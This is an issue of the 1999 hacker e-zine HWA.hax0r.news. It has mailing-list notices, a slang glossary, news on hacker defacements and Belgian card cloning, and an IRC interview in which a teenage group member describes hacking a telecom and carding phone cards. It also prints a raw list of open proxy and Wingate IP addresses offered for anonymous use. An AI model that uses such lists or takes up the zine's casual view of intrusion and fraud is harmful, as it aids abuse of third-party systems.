CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way I'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occurred, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and efficiently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..

Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list.

Please do NOT:

* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs.

Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body to listserv@listserv.ntsecurity.net

Welcome to Win2K Security Advice! Thank you for subscribing. If you have any questions or comments about the list please feel free to contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net.

To see what you've missed recently on the list, or to research an item of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec

==============

NTSecurity.net brings the security community a brand new (Oct 99) and much-requested Windows security mailing list. This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice), is geared towards promoting the open discussion of Windows-related security issues. With a firm and unwavering commitment towards timely full disclosure, this new resource promises to become a great forum for open discussion regarding security-related bugs, vulnerabilities, potential exploits, viruses, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community and we openly invite all security minded individuals, be they white hat, gray hat, or black hat, to join the new mailing list.

While Win2KSecAdvice was named in the spirit of Microsoft's impending product line name change, and meant to reflect the list's security focus both now and in the long run, it is by no means limited to security topics centered around Windows 2000. Any security issues that pertain to Windows-based networking are relevant for discussion, including all Windows operating systems, MS Office, MS BackOffice, and all related third party applications and hardware. The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to a security risk, it's relevant to the list.

The list archives are available on the Web at http://www.ntsecurity.net, which include a List Charter and FAQ, as well as Web-based searchable list archives for your research endeavors.
SAVE THIS INFO FOR YOUR REFERENCE:

To post to the list simply send your email to win2ksecadvice@listserv.ntsecurity.net

To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to listserv@listserv.ntsecurity.net

Regards,

Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com.....: currently active/programming/IRC+

Foreign Correspondents/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already, also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events it's a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about, otherwise enjoy - Ed ...

@HWA

00.4 What's in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind, if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Steven Levy's HACKERS anymore. BTW to all you up and comers, I'd highly recommend you get that book. It's almost like buying a clue.

Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3.
(revised) check that issue for the faq, it won't be reprinted unless changed in a big way, with the exception of the following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed below: Some are very useful, others attempt to deny any possible attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavy equals" sign means "almost equal" to. If written as =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL      - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk, watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk.

*CRACKER - 1. Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer
           2. An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger. Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC      - End of Commentary
EoA      - End of Article or more commonly @HWA
EoF      - End of file
EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER  - Read Steven Levy's HACKERS for the true definition, then see HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or 'can you hax0r some bread on the way to the table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN      - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin' way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same: Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
           Alternates: H  - hacking, hacktivist
                       C  - Cracking
                       C  - Carding
                       V  - Virus
                       W  - Warfare
                       A  - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                       P  - Phreaking, "telephone hacking" PHone fREAKs ...
                       CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA      - To Be Arranged/To Be Announced also 2ba
TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, no one can say this without severe repercussions from the underground masses. also "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf     - what the fuck, where the fuck, when the fuck etc ..

*ZEN     - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like to see more reader input, help me out here, what's good, what sucks etc, not that I guarantee I'll take any notice mind you, but send in your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ thedeuce ytcracker loophole BlkOps

Folks from #hwa.hax0r.news and #fawkerz, and other leet secret channels ... ;-)

Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick

kewl sites:

+ http://www.hack.co.za NEW
+ http://blacksun.box.sk NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always popular..." - FProphet '99

+++ When was the last time you backed up your important data?

++ Hackers: Governments hacks pointless
Contributed by Zym0t1c

The Feds aren't the only ones who don't approve of hacker attacks on several government Web sites. Some hackers are also condemning the exploits, calling them juvenile and pointless.

Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2269312,00.html?chkpt=zdnnsmsa

++ Hackers say they'll take off New Year's
Contributed by Zym0t1c

Two hacking groups have struck again, defacing several Web pages around the Internet. This time, however, they have a message for others looking to circumvent security on the Net: Don't hack over the New Year's weekend.

Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2413134,00.html

++ A Hacker Christmas
Contributed by Zym0t1c

Last-minute gift purchases for the hacker in the house, by Kevin Poulsen.

Read the article at:
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2412532,00.html?chkpt=zdnnsmsa

++ Government asks hackers for Y2K break
Contributed by Zym0t1c

WASHINGTON - President Clinton's top aide on Y2K matters has urged computer hackers to exercise self-restraint until after year 2000 technology fears largely have passed.
Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2408969,00.html?chkpt=zdnnsmsa

++ 'Net Attack' program threatens Internet sites
Contributed by Zym0t1c

Just before New Year, a new version of the so called 'Net Attack' or Tribe Flood Network (TFN) program was released. This version, TFN2K, is much more powerful and more difficult to detect. Experts fear that hackers will use TFN to hack into networks while everybody is celebrating New Year.

Read the dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=3749

Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, let's give the message board a bit more use eh? I'll be using a real message board when the hwa-iwa.org domain comes back online (soon), meanwhile the beseen board is still up...

==============================================================================

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf("Read commented source!\n\n");

    /*
     * w00t merry Christmas, Happy Hannukah or however the
     * fuck you spell it and Merry Yuletide etc etc oh ya
     * and Ramadan (Yeah I know its not this time of year
     * whatever, religion isn't what this is about), anyway
     * happy holidays and enjoy a new fun packed issue of HWA
     * complete with yer favourite info and proxy lists, smurf
     * amplifiers and some leet exploits.... werd up, and
     * get securing those boxes! hope you don't get called in
     * to fix script-kiddy damage over the holidays!
     *
     * Cruci
     *
     * cruciphux@dok.org
     * ICQ:58939315 note; not always online, do not abuse!
     * Preferred chat method: IRC Efnet in #HWA.hax0r.news
     */

    printf("EoF.\n");
    return 0;
}

Snailmail:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA L6V 4H5

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net
complaints and all nastygrams and mailbombs can go to /dev/nul
nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

-= start =--= start =--= start =--= start =--= start =--= start =--= start

Content Start

-= start =--= start =--= start =--= start =--= start =--= start =--=

Tip of the week: .us domains are free of charge to register.
http://www.nic.us/usdom-overview.html#Cost
of course you need to be in the .us to use this (or figure out a way to phake it) *g*

03.0 Socks proxies, Wingates and more from IRC4ALL
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by: HWA Staff (Yeah -Ed :-p)

WELL MAINTAINED and updated site. Check it out for proxy info. highly recommended - Ed.

This site is located at http://www.lightspeed.de/irc4all/

No formatting, data is presented raw direct from site. Most proxies are socks4 or 5, wingates are 4, ports are commonly 1080 or 8080, if you don't know how to use these don't use them! - Ed

Common ports for proxy use:

Port   Wingate service
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
21     FTP Proxy Server
23     Telnet Proxy Server
53     DNS Proxy Server
80     WWW Proxy Server
110    POP3 Proxy Server
808    Remote Control Service
1080   SOCKS Proxy Server
1090   Real Audio Proxy Server
7000   VDOlive Proxy Server
8000   XDMA Proxy Server
8010   Log Service

Not all services will work on all proxies/wingates, you will have to play with them and try them out.
Also admins close these down frequently but there ARE active useable proxies on the following lists, Play nice and don't over use or abuse. - Ed NotFound,200.36.19.225, NotFound,206.103.12.131, NotFound,210.56.18.225, NotFound,210.56.18.226, NotFound,210.56.18.241, NotFound,200.248.68.129, NotFound,210.56.18.253, NotFound,200.248.69.50, noeljo9.lnk.telstra.net,139.130.54.153, modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215, edtn004203.hs.telusplanet.net,161.184.152.139, NotFound,195.14.148.98, blissr.lnk.telstra.net,139.130.54.131, PPP46-166.lvsb.vsnl.net.in,202.54.46.166, cr216724724.cable.net.co,216.72.47.24, cr216724718.cable.net.co,216.72.47.18, 122-94.w3.com.uy,207.3.122.94, saward.lnk.telstra.net,139.130.55.98, icqtwsrv1.maiowoo.com,203.135.240.3, NotFound,212.22.69.35, 122-85.w3.com.uy,207.3.122.85, gw.eudynelson.com,207.176.25.66, sis-zeus.sville.edu.ph,207.0.119.67, dns-server1.tj.pa.gov.br,200.242.244.1, theleu.lnk.telstra.net,139.130.74.160, 210-55-191-125.ipnets.xtra.co.nz,210.55.191.125, nor24788-1.gw.connect.com.au,202.21.13.46, NotFound,210.161.200.82, www.slcr.cz,212.27.210.65, NotFound,210.56.19.5, northeastmicro.com,204.170.187.254, NotFound,195.5.33.222, marina.amakusa.gr.jp,210.164.238.50, h0040053c7824.ne.mediaone.net,24.128.48.55, NotFound,216.72.45.152, tconl9076.tconl.com,204.26.90.76, NotFound,193.227.185.210, NotFound,194.243.99.199, NotFound,202.54.48.85, NotFound,200.21.157.61, server.goway.com,205.206.42.162, web.urudata.com.uy,207.3.122.84, cr2167248104.cable.net.co,216.72.48.104, frontier.netline.net.au,203.28.52.160, interate.com.pe,209.45.73.174, 210-55-191-126.ipnets.xtra.co.nz,210.55.191.126, com3058-2.gw.connect.com.au,202.21.8.108, PPP46-254.lvsb.vsnl.net.in,202.54.46.254, NotFound,195.14.148.99, ibp.santa.krs.ru,195.161.57.133, mail.theova.com,195.14.148.65, cr2167254143.cable.net.co,216.72.54.143, NotFound,142.250.6.2, plebiscito.synapsis.it,195.31.227.14, ipshome-gw.iwahashi.co.jp,210.164.242.146, 
Public Proxies
~~~~~~~~~~~~~~

Non transparent proxies, suggest you use http://www.lightspeed.de/irc4all/ to test these when playing with them to see what info is passed.
(C) lp http://www.lightspeed.de/irc4all/

Telnettable Proxies
~~~~~~~~~~~~~~~~~~~
@HWA

04.0 Cyberarmy Proxies, Accounts and Wingates etc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

More goodies although somewhat less reliable, these are from the lists at cyberarmy.com. Beware phishes, traps and plain bogus info mixed into the cruft.

Unfortunately this section was unavailable in time for this issue due to server problems with cyberarmy.com. - Ed

@HWA

05.0 Belgium: Security of Banksys compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Zym0t1c, an HWA correspondent

Sorry no URL provided -Ed

Belgium: Security of Banksys compromised

Unknown persons have succeeded in compromising the security of Banksys, the company that controls pay terminals such as Bancontact and Mister Cash. By stealing a C-Zam pay terminal at a gas station these unknowns captured a list of credit cards and their codes. With this info they were able to create fake credit cards. By using special equipment they copied this info onto blank plastic cards. However, this story has two sides...
Two days before the C-Zam pay terminal was stolen, three hundred people had already lost ten thousand Belgian francs, due to the use of fake credit cards. Youri Tolmatchov, spokesman of Banksys, thinks these unknowns stole the terminal to make possible evidence disappear. The Public Prosecutor thinks these unknowns may have used binoculars or cameras to monitor the credit card codes as they were entered. Then, creating the fake cards is rather simple. Every good electronics store offers 'special equipment' like card copiers. This trick was shown in a comic TV show where two guys were able to copy information from credit cards by using a copier and a camera. The copies all worked perfectly. By the way, this Youri Tolmatchov is sort of accusing the two TV guys of setting a 'bad example.'

Banksys mentioned in a press conference the importance of using your secret code very discreetly. Incidents like these have already taken place in the past. One remarkable incident was last year in France where a ghost terminal, forged by experts, displayed 'out of use' and at the same time copied the card's info. The next generation of credit cards is more secure because they're based on little computer chips which are very hard to copy.

A question: why has Banksys not increased their security after that TV incident two years ago? This is asking for trouble...
@HWA

06.0 Public access mail servers
~~~~~~~~~~~~~~~~~~~~~~~~~~

Note: Not all newsgroups are available on all servers

Plus many more, check out http://www.serverseekers.com/new.html for a complete list and more details. - Ed

@HWA

07.0 Santa Claus about to lose his domain for nonpayment?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This was forwarded by another disgruntled elf (not the same one that lost his job at Santa's workshop last year who forwarded us his credit report)...seems Santa is feeling the crunch this year.
Date DEC-1-, 1999

Domain Name: Santasworkshop.com
Invoice Number: 313370
Amount Due: $70.00 US Dollars

This letter is being sent as a courtesy to advise that our records show payment for the domain name referenced above has not been received, surely a fat rich fuck like yourself can afford a domain name?

Our records show that the following person has been designated as the Billing Contact for the domain name in question.

Elfadmin Admin, Elf
Santa's Workshop
POBOX H0H0H0
North Pole
Santa@santasworkshop.com

If you believe that the payment and this notice may have crossed sleigh paths please verify the payment status by calling (888) 771-3000 from the U.S, Canada, Puerto Rico and the U.S Virgin Islands. From other locations call (402) 496-9798

If payment is not received within 10 days from the date of this notice, domain name service will be discontinued or one of your reindeer may be taken in lieu of payment.

Poor Santa... dire straits again... - Ed

@HWA

08.0 Interview with NFO (Nine Forty One Group)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NFO is a Brazilian hacking group that has been around for nearly a year. I caught up with one of the members on IRC and he agreed to a short interview with me, so here's a peek into the mind of another hacker/cracker. Their website is: http://www.self-evident.com/nfo/ check it out, they also list a few recent hacks on the page...

Interview start (Slightly edited to remove personal chit chat, otherwise verbatim)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Session Start: Fri Dec 24 15:33:53 1999

[15:33] i'm nfo member
[15:33] www.self-evident.com/nfo
you be on in a while? under this nick?
[15:34] now yes
ok ttyiab gotta finish something up join #hwa.hax0r.news and idle if u want bbiab
what does NFO stand for? just like it sounds? "info" ?
[15:40] no hack group
[15:40] we meet and hack
what does NFO stand for though? the group name? can I interview you for the zine?
[15:40] nfo=ninefortyone
[15:41] now?
sure won't take long
[15:41] ok
[15:41] start
How long has NFO been around as a group and how many members do you have?
[15:42] 6 months, 6 members
[15:42] fickerguy, sysdenial, codak, thms, grafspee, vetesgirl
sorry was interrupted. do you deface websites or hack for access only? I see some sites listed on your page
[15:46] in the beginning we were defacing a lot of brazilian government sites and some brazilians tv channels sites in brazil only cause we are brazilian except vetesgirl
ok you are located in Brazil?
[15:46] but after globo tv channels we decided to don't deface websites anymore cause in brazil only stupids are defacing sites nowadays
[15:47] yes 5 of us
what is your opinion on the 'scene' today?
[15:47] what do u mean? how r we on the scene?
what do you think about the other people in the scene? general feelings
[15:48] they r all assholes
[15:48] as we are
good answer ;)
[15:48] heh we make groups and code to change with them and that's all :)
do you write your own exploits?
[15:48] no i don't
would you call yourselves scriptkiddies then?
[15:49] i do tools to use them heh
[15:49] graf does
ok
[15:49] graf writes exploit
[15:49] as vetes and sys lots of skills and backdoors
[15:49] skills/tools
what are the ages of the members in the group? like oldest and youngest?
[15:50] i dunno exactly i think thms is 18, codak 16 or 17, graf and sys older, more than 23 and vetes i forgot heh more than 30 iam 15
do you stay in contact off IRC or exclusively online? like telephone etc
[15:51] we 5 ( brazilians ) keep contact out of irc.. i mean telephone
ok do you phreak too?
[15:52] no, all i do is that stuff with some wire in public phones and carding with some international phone cards
have any of your group or yourself ever been raided or afraid you might be?
[15:53] i've been
[15:53] i dunno about them
by who? which agency?
[15:53] i hacked main computers in telemar ( brazilian telephone company ) and they come my home
was the FBI involved? i've heard of the FBI acting outside of the US lately with Interpol in busts
[15:54] other time brazilian feds got me
so Telephone Security personnel?
[15:54] no
what were the consequences?
[15:54] with the feds i got in court and telemar we made an agreement
cash settlement?
[15:55] in the court as i was too young and a lot of talk they just asked me to don't do it anymore
[15:55] and with telemar lucky
[15:55] i told them how i hacked them
[15:55] and they forgive me
do you ever help out other admins after you've hacked their sites or patch holes you find?
[15:56] yes i did
ok any last words you'd like to say?
[15:57] *** duro (duro@pm2-balt-98.qis.net) invites you to join #fawkerz
[15:57] don't be a cow just hacking like a cow eat a lot of bullshit networks like a university in the end of the hell, hack cool stuff
ok anything else? any greets? :)
[15:58] greets to my mother, father, brother, nfo members and specially for you HEHEH
[15:58] j/k
hehe ok thanks for the interview i'll put it in issue #48
[15:59] ok thank u for the enjoying time
[15:59] i'll travel tonight
[15:59] we talk next week
[15:59] see ya
cya

Session Close: Fri Dec 24 15:59:42 1999

@HWA

09.0 The history of IRC (Internet Relay Chat)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This is here coz I had a discussion on which IRC network came first and was told Dalnet was before EFnet, which I knew was wrong, but it got me to thinking that not many people know the real stories of the networks they are using, so here's a couple of files on EFNet and DALNET for your edification and enlightenment - Ed

***NOTE! IF ANYONE has any info on BRC (Bitnet Relay Chat) I'd be VERY appreciative if you could email the info or point me in the direction of information on this predecessor to IRC. mail to cruciphux@dok.org tnx!
Source: http://www.the-project.org/history.html

Early IRC history

Dates by Ian, comments by Helen (this is a very rough cut)
Send additions/corrections to frechett@colorado.edu

summer 1988 - irc2.0 released

this is Jarkko's tale of the releasing of irc:

From jto@rieska.oulu.fi Fri Dec 10 18:23:37 1993
Date: Fri, 10 Dec 93 14:46:17 +0200
From: jto@rieska.oulu.fi (Jarkko Oikarinen)
To: hrose@eff.org
Subject: IRC History...
Content-Length: 3752

Included is a history of IRC as I wrote maybe 3 or 4 years ago. Hope it helps!

I don't know if this helps much. I hope I remember things correctly and apologise to the people whom I have left out and who had deserved to be in here.

I was working in the Department of Information Processing Science in University of Oulu during summer'88. I guess they didn't have much for me to do. I was administering the department's sun server, but it didn't take all my time. So I started doing a communications program, which was meant to make OuluBox (a Public Access BBS running on host tolsun.oulu.fi, administered by me) a little more usable. The purpose was to allow USENET News-kind of discussion and groups there in addition to real time discussions and other BBS related stuff.

Jyrki Kuoppala (jkp@cs.hut.fi) had implemented the rmsg program for sending messages to people on other machines. It didn't have the channel concept implemented (though it supported it), so it was mainly used for person-to-person communications.

Another already existing simple multiuser chat program on OuluBox was MUT (MultiUser Talk), it was written by Jukka Pihl (pihl@rieska.oulu.fi). That program had a bad habit of not working properly, so in order to fix this, the first implemented thing of this BBS plan was IRC.

The birthday of IRC was in August 1988. The exact date is unknown, at the end of the month anyways. Bitnet Relay Chat was a good inspiration for IRC.
When IRC started occasionally having more than 10 users, I asked some friends of mine to start running irc servers in south Finland, mainly in Tampere University of Technology and Helsinki University of Technology. Some other universities soon followed. Markku Järvinen (mta@cc.tut.fi) improved the irc client (there was only one at that time) to support some emacs editing commands.

At that time it was obvious that adding BBS-like functions to the program was not a good idea, it's better to have one program for one purpose. So the BBS extension idea was given up and just IRC stayed.

IRC was well spread in Finland. I contacted some friends of mine through BITNET Relay and asked if they would try this program. Internet connections did not yet work from Finland to other countries, so they could not connect to the Finnish network (which I suppose was the reason for them not being very enthusiastic about irc).

Internet connections to the States started working (I don't remember anymore when). I answered some news articles where people asked for multiuser chat programs. I didn't get replies.

At MIT, there was the legendary ai.ai.mit.edu machine running ITS. I got an account there and learned to use it a little bit. Enough to know how to chat with people. From there I got the first IRC user outside Scandinavia, Mike Jacobs used IRC through OuluBox (he did not have an account on any Unix machines).

